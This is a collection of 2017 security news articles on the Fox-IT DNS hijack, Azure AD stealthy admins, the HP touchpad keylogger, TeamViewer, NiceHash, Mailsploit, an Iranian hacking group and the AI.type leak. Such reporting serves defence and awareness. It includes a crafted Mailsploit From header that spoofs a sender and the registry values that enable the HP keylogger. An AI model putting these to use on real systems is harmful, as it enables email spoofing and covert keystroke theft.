Sept 19 2017, 02:05-02:15 Maximum 10-minute time window during which the attacker temporarily rerouted and intercepted Fox-IT email for the specific purpose of proving that they owned our domain in the process of fraudulently registering an SSL certificate for our ClientPortal.
Sept 19 2017, 02:21 The actual MitM against our ClientPortal starts. At this point, the fraudulent SSL certificate for ClientPortal was in place and the IP DNS record for clientportal.fox-it.com was changed to point to a VPS provider abroad.
Sept 19 2017, 07:25 We determined that our name servers for the fox-it.com domain had been redirected and that this change was not authorized. We changed the DNS settings back to our own name servers and changed the password to the account at our domain registrar. This change will have taken time to have full effect, due to caching and the distributed nature of the domain name system.
Sept 19 2017, 12:45 We disabled the
second factorauthentication for our ClientPortal login authentication system (text messages), effectively preventing users of ClientPortal from successfully logging in and having their traffic intercepted. Other than that, we kept ClientPortal functional in order not to disclose to the attacker that we knew what they were doing, and to give ourselves more time to investigate. At this point, the MitM against ClientPortal was still active technically, but would no longer receive traffic to intercept as users would not be able to perform

two factorauthentication and

log in.

Sept 19 – Sept 20 2017 A full investigation into the incident was undertaken, along with notification of all clients that had files intercepted and the relevant authorities, including the Dutch Data Protection Authority. A police investigation was launched and is still ongoing. Based on the outcome of our investigation, we understood the scope of the incident, we knew that the attack was fully countered and we were prepared to re-enable two factor authentication on ClientPortal in order to make it fully functional again.
Sept 20, 15:38 ClientPortal fully functional again. Our internal investigation into the incident continued.


Hackers Target Security Firm Fox-IT
15.12.2017 securityweek Hacking
Fox-IT, the Netherlands-based cybersecurity firm owned by NCC Group, revealed on Thursday that it had been the victim of a man-in-the-middle (MitM) attack made possible by DNS records getting changed at its third-party domain registrar.

The incident took place back in September and Fox-IT decided to disclose it now after conducting a detailed analysis. A law enforcement investigation is ongoing so the company has not shared any information on who might be behind the attack.

The security firm traced the attackers’ initial activities to September 16, when it detected port and vulnerability scanning attempts. Then, on September 19, using compromised credentials, the hackers changed the DNS records for fox-it.com at the company’s service provider.

The main target was apparently Fox-IT’s ClientPortal, an application used to securely exchange files with customers and suppliers.

For a total of roughly 10 minutes, the attackers also managed to reroute Fox-IT emails in an effort to demonstrate that they owned the company’s domain so that they could fraudulently register an SSL certificate for the ClientPortal application.

Shortly after that, the rogue SSL certificate was used for an MitM attack on ClientPortal, with traffic to the portal routed through a virtual private server (VPS) provider abroad.

Fox-IT noticed the malicious activity after roughly five hours and quickly worked to restore DNS settings and secure its account with the domain registrar. However, due to caching and how DNS works, it took some time for the changes to take effect and the MitM attack was carried out for 10 hours and 24 minutes.

During this time, the attacker managed to intercept the credentials of nine users, one mobile phone number, a “subset” of names and email addresses, ClientPortal account names, and 12 files, including three that contained confidential client information, Fox-IT said. All affected customers have been notified.

The security firm has not been able to determine what other messages the hackers may have intercepted during the 10 minutes while they had control over Fox-IT email.

After discovering the incident, the company said it blocked the attacker from intercepting additional customer information by disabling the two-factor authentication (2FA) mechanism on the ClientPortal application. By disabling 2FA, Fox-IT prevented customers from logging in to their account – 2FA is mandatory on the portal – but avoided letting the attackers know that the intrusion had been detected in an effort to continue observing their actions.

Fox-IT believes the attackers likely gained access to its DNS registrar account using credentials that were leaked following a breach at a third-party service provider. The password had not been changed by the security firm since 2013, and the DNS provider does not offer 2FA, allowing the hackers to easily change DNS records.

“The use of full packet capture and CTMp network sensors was crucial in determining the scope of the attack,” Fox-IT said in a blog post. “We could, within a few hours of finding out about the attack, determine exactly who was affected and what the scope of the attacker was. This helped us to understand the incident with confidence and to quickly notify those directly affected and the Dutch Data Protection Authority.”

It’s not uncommon for cybersecurity firms and their employees to be targeted by hackers. For example, Kaspersky and Avast’s CCleaner were breached by sophisticated actors, while Bitdefender and FireEye were targeted by individuals who made exaggerated claims.


Stealthy Admin Accounts Found in Hybrid Office 365 Deployments
13.12.2017 securityweek Hacking
Vulnerability in Azure AD Connect Software Can Provide Stealthy Admins With Full Domain Control

One term used for privileged Admin accounts that exist outside of protected groups is 'stealthy admins'. They are less protected and less monitored than those within protected groups, and can consequently provide a major security risk.

The team at Preempt Security has discovered an automatically generated stealthy admin account in hybrid on-premise/Azure Microsoft Office 365 (O365) deployments.

One aspect of the Preempt Platform's operation is to investigate and prevent insider threats, and this in turn involves detecting insider opportunities for escalating privileges. Escalation involves acquiring the rights of or using a privileged administrator account; and for this reason admin accounts should always be given greater protection.

"Organizations have well-defined groups for administrators, where they can be monitored and protected," explains Ajit Sancheti, CEO and co-founder of Preempt; "but sometimes users are given administrator rights without the account being placed into an administrator group. That's what we call a 'stealthy administrator'. Part of our job is to detect these."

Researchers from Preempt discovered that a stealthy admin is created as a matter of course during the normal use of Microsoft's Azure AD Connect. AD Connect is a tool used by organizations with hybrid on premise and cloud Office 365 deployments. It integrates on premise Active Directory with Azure AD, so that users can have a common identity throughout.

The default express use of AD Connect creates a Microsoft On Line account (MSOL) that has domain admin privileges but exists outside of any protected admin group; that is, it lives in the built-in Users Group. In order to synchronize passwords between on premise accounts and cloud, it has the ability to replicate the domain.

"Most Active Directory audit systems easily alert on excessive privileges, but will often miss users who have elevated domain privileges indirectly through domain discretionary access control list (DACL) configuration," said Roman Blachman, CTO and co-founder at Preempt. "We refer to these users as stealthy admins. The majority of our customers have Office 365 hybrid deployments and almost every one of them were vulnerable to this because Azure AD Connect was installed in express settings and created this flaw." Blachman has also explained the issue in a blog posted today.

Anyone with access to User accounts could gain access through these to the MSOL account and acquire high level domain privileges. This could be an attacker already on the network looking to escalate privilege, or a 'rogue' employee. In the latter instance, Preempt gives the example of a help desk that uses a contract employee. That employee would be a domain user, but also an account operator for help desk functional purposes.

The help desk staff is effectively part of the supply chain but with direct -- and legitimate -- access to user accounts, plus one account with domain level privileges. If compromised -- or simply rogue -- the help desk operator's account could get access to every admin account on the domain via the MSOL account. Since the MSOL account is not in a protected admin group, it will not be tracked or monitored like other admin accounts -- and its use by an attacker will not trigger the alerts that it should.

The MSOL account will exist as a stealthy admin as a matter of course for any organization that has used AD Connect to synchronize user passwords between on premise and cloud deployments of Office 365.

Preempt reported the issue to Microsoft, which has today issued an advisory and fix. "Suppose there is a malicious on-premises AD administrator with limited access to customer's on-premises AD but has Reset-Password permission to the AD DS account," explains the advisory. "The malicious administrator can reset the password of the AD DS account to a known password value. This in turn allows the malicious administrator to gain unauthorized, privileged access to the customer's on-premises AD."

Microsoft's solution going forward is an 'improvement' to Azure AD Connect that ensures that the account it creates will in future have the recommended permissions. For Azure users who have already used AD Connect, Microsoft says, "You can use the PowerShell script available at Prepare Active Directory Forest and Domains for Azure AD Connect Sync to help you implement the permission changes on the AD DS account."

The Microsoft fix is not a patch for existing implementations. AD Connect will be updated so that its future use will not lead to a stealthy MSOL account. For existing implementations, it is releasing a script that will find and move the MSOL account to a safe location.

It is worth noting, however, that MSOL is unlikely to be the only stealthy admin on a network. While this Microsoft fix will detect the MSOL stealthy admin, it will not solve the problem of other stealthy accounts.

"We're seeing this in almost all of our customers," commented Sancheti. "We have never installed product with any customer without finding at least one or more stealthy admins -- usually anything between 5 to 100. Because of the complexity of Active Directory, it is quite common for one account to be given access to another account without ever realizing what permissions are quietly inherited in the process."

Preempt has developed and released a free tool called Preempt Inspector. "It's purpose is to detect all stealthy accounts, that are often innocently created through configuration errors -- but that create a hidden risk for the network."


Dormant Keylogging Functionality Found in HP Laptops
11.12.2017 securityweek Hacking
A researcher has discovered that a touchpad driver present on hundreds of HP laptops includes functionality that can be abused for logging keystrokes. The vendor has released patches for a vast majority of affected devices.

Michael Myng was looking for ways to control the keyboard backlight functionality on HP laptops when he noticed that the driver from Synaptics (SynTP.sys) included keylogging functionality.

The problematic code is apparently part of a debugger implemented through the Windows software trace preprocessor (WPP). The feature is disabled by default, but a user with administrator privileges can enabled it by changing a value in the Windows registry, allowing them to log keystrokes to a local file.

Myng informed HP of his findings and the company released updates that remove the problematic debugging functionality for nearly all impacted products. However, devices from other vendors that use this Synaptics driver could be affected as well.

“A potential security vulnerability has been identified with certain versions of Synaptics touchpad drivers that impacts all Synaptics OEM partners,” HP said in its advisory. “A party would need administrative privileges in order to take advantage of the vulnerability. Neither Synaptics nor HP has access to customer data as a result of this issue.”

The vulnerability, classified by the vendor as “medium severity,” impacts more than 460 laptop models, including many EliteBook, mt, ProBook, Spectre Pro, Stream, ZBook, Envy, Pavilion, Split and Omen devices.

Some people have pointed out that an attacker who has the privileges required to activate the keylogger functionality could do anything on the system, including install a proper keylogger, and would not need to exploit this vulnerability. Others, however, believe it could still be useful for malicious actors since the keylogging mechanism is already in place.

This is not the first time keylogging functionality has been found in software shipped with HP laptops. Back in May, researchers discovered that a Conexant audio driver installed on some HP laptops had been logging keystrokes to a file.


Pre-Installed Keylogger Found On Over 460 HP Laptop Models
10.12.2017 thehackernews  Hacking

HP has an awful history of 'accidentally' leaving keyloggers onto its customers' laptops. At least two times this year, HP laptops were caught with pre-installed keylogger or spyware applications.
I was following a tweet made by a security researcher claiming to have found a built-in keylogger in several HP laptops, and now he went public with his findings.
A security researcher who goes by the name of ZwClose discovered a keylogger in several Hewlett-Packard (HP) laptops that could allow hackers to record your every keystroke and steal sensitive data, including passwords, account information, and credit card details.
The Keylogger was found embedded in the SynTP.sys file, a part of Synaptics touchpad driver that ships with HP notebook computers, leaving more than 460 HP Notebook models vulnerable to hackers.
Although the keylogger component is disabled by default, hackers can make use of available open source tools for bypassing User Account Control (UAC) to enable built-in keylogger "by setting a registry value."
Here’s the location of the registry key:
HKLM\Software\Synaptics\%ProductName%
HKLM\Software\Synaptics\%ProductName%\Default
The researcher reported the keylogger component to HP last month, and the company acknowledges the presence of keylogger, saying it was actually "a debug trace" which was left accidentally, but has now been removed.
"A potential security vulnerability has been identified with certain versions of Synaptics touchpad drivers that impact all Synaptics OEM partners," HP says in its advisory, calling the keylogger as a potential, local loss of confidentiality.
"A party would need administrative privileges in order to take advantage of the vulnerability. Neither Synaptics nor HP has access to customer data as a result of this issue."
The company has released a Driver update for all the affected HP Notebook Models. If you own an HP laptop, you can look for updates for your model. The list of affected HP notebooks can be found at the HP Support website.
This is not the very first time when a keylogger has been detected in HP laptops. In May this year, a built-in keylogger was found in an HP audio driver that was silently recording all of its users' keystrokes and storing them in a human-readable file.


Expert discovered a Keylogger component in HP notebook keyboard driver
9.12.2017 securityaffairs Hacking

A security researcher discovered that hundreds of notebook models contain a debugging code that could be abused by attackers as a keylogger component.
Hundreds of notebook models contain a debugging code that could be abused by attackers as a keylogger component. The code was discovered by a security researcher that goes online with the moniker ZwClose, the list of affected models and security patch are available at the following URL:

https://support.hp.com/us-en/document/c05827409

The list of affected notebooks includes 475 models, 303 consumer notebooks and 172 commercial notebooks, mobile thin clients, and mobile workstations. Affected model families include HP’s 25*, mt**, 15*, OMEN, ENVY, Pavilion, Stream, ZBook, EliteBook, and ProBook series, along with several Compaq models.


ZwClose
@zwclose
Oh well. Keylogger in HP's SynTP.sys. Off by default. Vendor contacted. Fix released and pushed. Blog post is on the way.

11:28 AM - Dec 6, 2017
Replies 2 2 Retweets 5 5 likes
Twitter Ads info and privacy
HP has released security updates for its drivers in order to remove the debugging code that was present in the SynTP.sys file, which is part of the Synaptics Touchpad driver.

HP customers know that the Synaptics Touchpad driver is shipped with many HP notebook models.

“HP had a keylogger in the keyboard driver. The keylogger saved scan codes to a WPP trace. The logging was disabled by default but could be enabled by setting a registry value (UAC required). ” reads the blog post published by the expert.

That registry key is:

HKLM\Software\Synaptics\%ProductName% HKLM\Software\Synaptics\%ProductName%\Default
The Windows software trace preprocessor (WPP) technique is used by developers for debugging code.

“WPP software tracing supplements and enhances WMI event tracing by adding ways to simplify tracing the operation of the trace provider. It is an efficient mechanism for the trace provider to log real-time binary messages. The logged messages can subsequently be converted to a human-readable trace of the operation of the trace provider.” states Microsoft.

Conexant audio driver keylogger

Of course, the risk is that this debugging feature could be abused by vxers to enable the keylogging feature present in the code and spy on HP users. The native code runs at kernel level and is to detectable by security software.

Malware developers only need to bypass the UAC prompt when changing the registry key, and there are many ways to do it.

HP admitted the presence of keylogging code confirming it was used for debugging purposed and accidentally and left because of a forgetfulness, for this reason, the tech giant “released an update that removes the trace.”

The researcher that uses the Twitter handles THS explained that HP did not remove the keylogger functions in the new version, the company simply turn it on by setting SeeScanCode and EnableLog = 1 in Windows Registry.

THS
@__ths__
#HP did not remove the #keylogger functions in new version. Simply turn it on by setting SeeScanCode and EnableLog = 1 in Windows Registry.

10:26 AM - May 13, 2017
22 22 Replies 662 662 Retweets 475 475 likes
Twitter Ads info and privacy
In May, the security researcher Thorsten Schroeder of security firm Modzero discovered that a Conexant audio driver shipped with many HP laptops and tablet PCs was logging keystrokes. The expert discovered that MicTray64.exe application, which is installed with the Conexant audio driver package, is registered as a scheduled task in Windows systems and is able to monitor keystrokes to determine if the user has pressed any audio-related keys (e.g. mute/unmute).


New TeamViewer Hack Could Allow Clients to Hijack Viewers' Computer
8.12.2017 thehackernews  Hacking

Do you have remote support software TeamViewer installed on your desktop?
If yes, then you should pay attention to a critical vulnerability discovered in the software that could allow users sharing a desktop session to gain complete control of the other's PC without permission.
TeamViewer is a popular remote-support software that lets you securely share your desktop or take full control of other's PC over the Internet from anywhere in the world.
For a remote session to work both computers—the client (presenter) and the server (viewer)—must have the software installed, and the client has to share a secret authentication code with the person he wants to share his desktop.
However, a GitHub user named "Gellin" has disclosed a vulnerability in TeamViewer that could allow the client (sharing its desktop session) to gain control of the viewer's computer without permission.
TeamViewer Hack Could Be Used By Anyone—Server Or Client
Gellin has also published a proof-of-concept (PoC) code, which is an injectable C++ DLL, which leverages "naked inline hooking and direct memory modification to change TeamViewer permissions."
The injectable C++ DLL (hack) can be used by both, the client and the server, which results as mentioned below:
If exploited by the Server—the hack allows viewers to enable "switch sides" feature, which is only active after the server authenticated control with the client, eventually allowing the server to initiate a change of control/sides.

If exploited by the Client—the hack allows the client to take control of the mouse and keyboard of the server "with disregard to servers current control settings and permissions."

This vulnerability impacts TeamViewer versions running on Windows, macOS as well as Linux machines.
A Reddit user "xpl0yt," who first publicized this vulnerability, claimed to have been in contact with the TeamViewer security team, who confirmed him the existence of the vulnerability in its software and released a patch for Windows.
A TeamViewer spokesperson told The Hacker News, "We are patching versions 11-13. Windows is already available, whereas MacOS and Linux are expected later today."
TeamViewer users are recommended to install the patched versions of the software as soon as they become available. Patches will be delivered automatically to those users who have configured their TeamViewer software to receive automatic updates.


Largest Crypto-Mining Exchange Hacked; Over $70 Million in Bitcoin Stolen
8.12.2017 thehackernews  Hacking

Bitcoin is breaking every record—after gaining 20% jump last week, Bitcoin price just crossed the $14,800 mark in less than 24 hours—and there can be no better reason for hackers to put all of their efforts to steal skyrocketing cryptocurrency.
NiceHash, the largest Bitcoin mining marketplace, has been hacked, which resulted in the theft of more than 4,700 Bitcoins worth over $57 million (at the time of breach).
And guess what? You'll be surprised to know that the stolen BTC now worth over $70 million—in less than 24 hours.
Founded in 2014, NiceHash is a cloud-based crypto-mining marketplace that connects people from all over the world to rent out their spare computing power to other in order to create new coins.
On Wednesday, several NiceHash users reported that their BTC wallets had been emptied, which was later confirmed by NiceHash after its service went offline claiming to be undergoing maintenance.
At the time of writing, the NiceHash service is still offline with a post on its website, confirming that "there has been a security breach involving NiceHash website," and that hackers stole the contents of the NiceHash Bitcoin wallet.

The company did not provide any further details about the security incident, but it did say that NiceHash has paused its operations for next 24 hours while it figures out exactly how many numbers of BTC were swiped from its website and how it was taken.
Although NiceHash has not confirmed the number of bitcoins stolen from its virtual wallet, some of its customers have circulated a wallet address that suggests around 4,736 BTC—worth more than $70 million based on today's price—in total were drained from the company's wallet.
NiceHash has initiated an investigation into the matter, and has reported the incident to the "relevant authorities and law enforcement" and has been "co-operating with them as a matter of urgency."
The company also assured its customers that it is "fully committed to restoring the NiceHash service with the highest security measures at the earliest opportunity," but it's still unclear how the company will manage to settle everything if it is unable to compensate the total loss.
"We understand that you will have a lot of questions, and we ask for patience and understanding while we investigate the causes and find the appropriate solutions for the future of the service. We will endeavor to update you at regular intervals," the company says.
Following the security incident, NiceHash is recommending its customers to change their passwords—both on NiceHash and other services, if they are using the same credentials.
NiceHash is the latest cryptocurrency company to suffer a significant blow in recent months. Another major hack took place last month due to a flaw in Parity's wallet that caused over $160 million in ETH (Ether) to be frozen, while nearly $32 million in ETH was stolen by hackers in July.


Mailsploit: Popular Email Apps Allow Spoofing, Code Injection
6.12.2017 securityweek  Hacking  
Tens of email clients, including some of the most popular applications, are plagued by flaws that can be exploited for address spoofing and, in some cases, even for code injection.

The attack method, dubbed Mailsploit, was discovered by Sabri Haddouche, a pentester and bug bounty hunter whose day job is at secure messaging firm Wire.

The researcher found that an attacker can easily spoof the sender’s address in an email, and even bypass spam filters and the DMARC protection mechanism. More than 30 email apps are impacted, including Apple Mail, Mozilla Thunderbird, Outlook and other applications from Microsoft, Yahoo Mail, Hushmail, and ProtonMail.

All affected vendors were notified in the past months. Yahoo, ProtonMail and Hushmail have already released patches, while others are still working on a fix. Some organizations, such as Mozilla and Opera, said they don’t plan on addressing this issue, and others have not informed Haddouche on whether or not fixes will be rolled out.

Mailsploit attacks are possible due to the way non-ASCII characters are encoded in email headers. These headers are required to contain only ASCII characters, but RFC-1342, published in 1992, provides a way to encode non-ASCII characters so that mail transfer agents (MTAs) can process the email.

Haddouche discovered that many email providers, including clients and web-based apps, fail to properly sanitize the decoded string, which leaves room for abuse.

For example, take the following string in the From parameter of the header:

From: =?utf-8?b?cG90dXNAd2hpdGVob3VzZS5nb3Y=?==?utf-8?Q?=00?==?utf-8?b?cG90dXNAd2hpdGVob3VzZS5nb3Y=?=@mailsploit.com

When decoded by Apple’s Mail application, it becomes:

From: potus@whitehouse.gov\0(potus@whitehouse.gov)@mailsploit.com

However, iOS discards everything after the null byte, and macOS displays only the first valid email address it detects, which leads to recipients seeing the sender as “potus@whitehouse.gov.”

The Mailsploit attack can be dangerous not only because of how the email address can be spoofed. Using this method also bypasses DMARC, a standard that aims to prevent spoofing by allowing senders and recipients to share information about the email they send to each other.

“The server still validates properly the DKIM signature of the original domain and not the spoofed one,” the researcher explained. “While MTAs not only don’t detect and block these spoofed email addresses, they will happily relay those emails as long as the original email seems trustworthy enough (the attacker can therefore ironically profit from setting up DMARC on that email address). This makes these spoofed emails virtually unstoppable at this point in time.”

In some cases, attackers can also execute arbitrary JavaScript code. This is possible by encoding the code they want to execute in the From parameter of the header. The code will get executed either when the malicious email is opened or when certain actions are performed (e.g. creating a new rule, replying to an email), depending on the application.


HBO Hacker Linked to Iranian Spy Group
6.12.2017 securityweek Hacking    
A man accused by U.S. authorities of hacking into the systems of HBO and attempting to extort millions of dollars from the company has been linked by security researchers to an Iranian cyber espionage group tracked as Charming Kitten.

Security firm ClearSky has published a new report detailing the activities of Charming Kitten, which is also known as Newscaster and NewsBeef. The threat actor has been active since at least 2014 and it has targeted numerous entities in Iran, the U.S., Israel, the U.K. and other countries. Its attacks have often been aimed at individuals involved in academic research, human rights and the media.

The ClearSky report describes the group’s activities during 2016-2017, including the infrastructure used and a new piece of malware named DownPaper. It also details the connection between the individual accused of hacking HBO and Charming Kitten, and reveals the identities of two other alleged members of the group.

Behzad Mesri, also known as Skote Vahshat, was charged last month by U.S. prosecutors on seven counts related to hacking HBO, stealing scripts and other information on popular TV shows, and threatening to release the data unless the network paid $6 million in Bitcoin.

When they unsealed the indictment, authorities said Mesri had also launched cyberattacks on behalf of the Iranian military against military systems, nuclear software systems, and Israeli infrastructure. They also claimed he was a member of an Iran-based hacking group called Turk Black Hat, which conducts website defacements.

Collin Anderson, a researcher specializing in state-sponsored attacks, particularly ones attributed to Iran, was the first to point out that based on the information in the indictment, Mesri appeared to be a member of Charming Kitten.

ClearSky has also found connections between Masri and Charming Kitten. One of the links is through “ArYaIeIrAN,” another member of Turk Black Hat. Email addresses associated with this individual have been used to register several Charming Kitten domains. The same email address also registered a domain for an Iranian hosting firm named MahanServer, which has hosted Charming Kitten infrastructure.

The CEO of this company appears to be one Mohammad Rasoul Akbari, and ArYaIeIrAN could be one Mohammadamin Keshvari, who is listed as MahanServer’s only other employee on LinkedIn. Akbari is linked to Masri via their Facebook profiles.

“We estimate with medium certainty that the three are directly connected to Charming Kitten, and potentially, along with others – are Charming Kitten,” ClearSky wrote in its report.

In the past years, security researchers have linked several cyber espionage groups to Iran, including APT33, Rocket Kitten, Cobalt Gypsy (Magic Hound), and CopyKittens. There are many overlaps between these actors, both in terms of infrastructure and malware, which means the individuals identified by ClearSky could be part of other Iranian groups as well, not just Charming Kitten.


31 Million of client records belonging to the virtual keyboard app AI.type leaked online
6.12.2017 securityaffairs  Hacking

Another day, another clamorous data breach, this time let’s discuss a data breach that exposes personal data collected by the Keyboard App AI.type.
This story reminds us that every time we download an app we are enlarging our surface of attack, in the majority of cases we are not aware of exact amount of data they collect and how they use them

A group of researchers at the Kromtech Security Center has discovered online a huge trove of personal data belonging to more than 31 million users of the popular virtual keyboard app, AI.type.

The data was included in a MongoDB database that has been accidentally exposed online without any mechanism of protection.

“The Kromtech Security Center has discovered a massive amount of customer files leaked online and publically available. Researchers were able to access the data and details of 31,293,959 users.” states the post published by Kromtech Security.

“The misconfigured MongoDB database appears to belong to Ai.Type a Tel Aviv-based startup that designs and develops a personalized keyboard for mobile phones and tablets for both Android and iOS devices.”

Ai.Type was founded in 2010, its customizable and personalizable on-screen keyboard for Android was downloaded about 40 million times from the Google Play store.
The misconfigured MongoDB database exposed 577 GB of data online, the records include sensitive details on the users, and the worst thing is that such data was not even necessary for the app to work. Researchers highlighted the fact that the Ai.Type request “Full Access” to all data stored on the mobile devices.

“When researchers installed Ai.Type they were shocked to discover that users must allow “Full Access” to all of their data stored on the testng iPhone, including all keyboard data past and present. It raises the question of why would a keyboard and emoji application need to gather the entire data of the user’s phone or tablet?” continues the post.

“Based on the leaked database they appear to collect everything from contacts to keystrokes. This is a shocking amount of information on their users who assume they are getting a simple keyboard application.”

ai.type keyboard

The leaked data includes:

Full name, phone number, and email address
Device name, screen resolution and model details
Android version, IMSI number, and IMEI number
Mobile network name, country of residence and even user enabled languages
IP address (if available), along with GPS location (longitude/latitude).
Links and the information associated with the social media profiles, including birth date, emails, photos.
The researcher made another shocking discovery, the 6,435,813 records contained data collected by the app from users’ contact books. The leaked database included more than 373 million records scraped from registered users’ phones, which include all their contacts saved/synced on linked Google account.

The archive also includes a range of statistics.

“There was a range of other statistics like the most popular users’ Google queries for different regions. Data like average messages per day, words per message, the age of users, words_per_day’: 0.0, ‘word_per_session and a detailed look at their customers,” the researchers say.

The real question is, “why would like a keyboard, and emoji application need to gather the entire data of the user’s phone or tablet?”